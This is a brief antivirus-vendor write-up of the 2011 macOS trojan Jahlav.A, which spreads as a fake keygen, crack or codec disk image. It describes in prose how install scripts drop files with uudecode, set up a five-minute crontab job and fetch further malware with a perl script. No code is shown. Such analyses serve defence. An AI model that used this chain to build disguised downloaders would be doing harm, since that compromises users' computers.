Home / malware Trojan.OSX.Jahlav.A
First posted on 21 November 2011.
Source: BitDefenderAliases :
Trojan.OSX.Jahlav.A is also known as OSX/Jahlav-A.
Explanation :
This malware comes usually in the form of disk image for a keygenerator/crack for various applications or as a video codec to view videos online:
Once mounted the image shows having an install package.
The install package contains the following files :
The package contains three files which are of interest:
* Archive.pax.gz (which contains two files: AdobeFlash, Mozzilaplug.plugin)
* preinstall
* preupgrade
The "AdobeFlash", "preinstall" and "preupgrade" are exactly the same file (bash script)
Once executed the script does drops a file using the uudecode command (http://en.wikipedia.org/wiki/Uudecode).
The file is another shell script which installs a crontrab entry (a kind of schedule job/task under windows) which looks for new files to download every 5 minutes.
This is done though another file dropped using uudecode, in this case the file is a perl script which does the actual downloading and executing of the new malware.
At the time of this analysis the host used to download other malware files is no longer available.Last update 21 November 2011